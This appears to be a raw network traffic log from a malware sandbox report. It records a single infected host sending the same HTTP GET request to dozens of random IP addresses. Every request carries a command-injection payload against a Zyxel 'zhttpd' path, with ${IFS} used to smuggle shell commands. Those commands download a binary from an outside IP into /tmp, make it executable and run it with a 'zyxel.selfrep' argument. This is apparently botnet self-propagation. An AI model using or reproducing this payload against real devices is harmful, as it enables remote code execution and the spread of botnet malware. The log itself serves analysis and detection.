                                                  Jan 19, 2024 18:24:15.454592943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9287192.168.2.13602242.26.25.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454621077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9288192.168.2.1356080101.228.40.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454668999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9289192.168.2.1343088140.176.134.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454710960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9290192.168.2.1349044121.135.1.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454766989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9291192.168.2.1358560191.148.98.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454807997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9292192.168.2.135924837.255.121.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454847097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9293192.168.2.134993068.197.122.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454900980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9294192.168.2.1341234108.134.62.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454940081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9295192.168.2.1353356153.161.219.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454977989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9296192.168.2.135552012.178.29.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455022097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9297192.168.2.134267677.58.30.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455070019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9298192.168.2.135476646.120.115.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455106974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9299192.168.2.13370024.16.160.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455140114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9300192.168.2.1347192168.213.81.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455193996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9301192.168.2.135934898.80.225.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455252886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9302192.168.2.1337346148.59.155.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455275059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9303192.168.2.1353758121.114.58.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455319881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9304192.168.2.1360610145.216.155.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455372095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9305192.168.2.1349832174.106.125.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455424070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9306192.168.2.134164641.109.24.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455457926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9307192.168.2.1340282216.171.126.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455491066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9308192.168.2.1338376212.166.214.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455538034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9309192.168.2.135323092.1.120.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455595970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9310192.168.2.1340912128.66.156.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455636024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9311192.168.2.136044890.5.34.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455671072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9312192.168.2.135409473.75.19.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455740929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9313192.168.2.135319459.22.38.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455790043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9314192.168.2.133599261.143.96.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455845118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9315192.168.2.133744085.98.141.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455899954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9316192.168.2.1358818137.92.7.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455913067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9317192.168.2.1360372121.188.126.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.455960989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9318192.168.2.1339740140.115.202.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456002951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9319192.168.2.1356364205.182.104.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456062078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9320192.168.2.134723873.219.242.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456104040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9321192.168.2.1348090174.176.103.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456130981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9322192.168.2.1335576202.56.49.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456196070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9323192.168.2.1350430137.3.124.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456232071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9324192.168.2.134321031.18.221.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456262112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9325192.168.2.134381292.185.247.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456314087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9326192.168.2.1351054152.152.9.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456351042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9327192.168.2.1332832107.99.91.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456404924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9328192.168.2.1343802135.100.145.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456440926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9329192.168.2.134735483.78.213.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456478119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9330192.168.2.135715641.65.102.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456531048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9331192.168.2.135415891.216.13.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456567049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9332192.168.2.1334974113.72.148.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456617117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9333192.168.2.134391468.235.105.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456655979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9334192.168.2.133669481.177.206.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456681967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9335192.168.2.133880453.244.171.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456701994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9336192.168.2.1355528121.83.147.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.456747055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9337192.168.2.1359206185.142.174.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.457338095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9338192.168.2.134715654.155.235.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.457403898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9339192.168.2.1358996172.32.23.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.459464073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9340192.168.2.1355270221.4.168.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461205959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9341192.168.2.1351042199.84.15.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461257935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9342192.168.2.1339516211.239.184.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461302042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9343192.168.2.1350506191.241.106.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461348057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9344192.168.2.1349882221.69.173.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461386919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9345192.168.2.135770671.110.150.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461429119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9346192.168.2.1359044216.239.195.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461472034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9347192.168.2.1336082102.142.128.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461519957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9348192.168.2.1344824151.240.163.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461553097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9349192.168.2.1333138153.75.219.88443
                                                  TimestampBytes transferredDirectionData
